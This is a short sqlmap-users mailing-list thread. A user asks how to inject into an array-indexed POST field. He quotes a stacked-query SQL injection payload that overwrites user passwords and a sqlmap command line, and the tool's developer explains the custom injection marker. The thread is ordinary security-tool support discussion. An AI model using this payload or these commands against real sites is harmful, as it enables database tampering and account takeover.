Thanks man ; I want to send an array with query in its index as value of "name" POST variable .
Remember if i want inject it manually should try > <input type="text" id="edit-name" name="name[1 ;UPDATE {users} SET pass= 'test123'; -- ]" value="" size="60" maxlength="60" class="form-text required error"> So tried (sqlmap/1.0-dev) : python sqlmap.py -u "http://localhost//?id=n&ssid=w" --data="name[0*]=name" --risk=3 --flush-session --dbms=mysql Sqlmap returns this error: [WARNING] (custom) POST parameter '#1*' is not injectable What does # mean here ? And how to make it work under sqlmap ? Regards On Thu, Oct 23, 2014 at 11:00 AM, Miroslav Stampar < miroslav.stam...@gmail.com> wrote: > Hi. > > You need to put a custom injection mark * at the place where you want > sqlmap to inject. For example: > > ...name[1*] > > Bye > > p.s. your example with SELECT is not a proper one as queries are usually > not supported in stacking > > On Thu, Oct 23, 2014 at 7:43 AM, a dehqan <dehqa...@gmail.com> wrote: > >> Hi Guys , >> >> Is Sqlmap able to send an array instead of string while injecting? >> >> Like situation we have html form and we want manually send post variable >> 'name' this way (value is obtained from array) : >> >> name="name[1 ;select * from users -- ] >> >> I want do it with Sqlmap , but how ? >> >> >> Regards dehqan >> > > > > -- > Miroslav Stampar > http://about.me/stamparm >
------------------------------------------------------------------------------
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users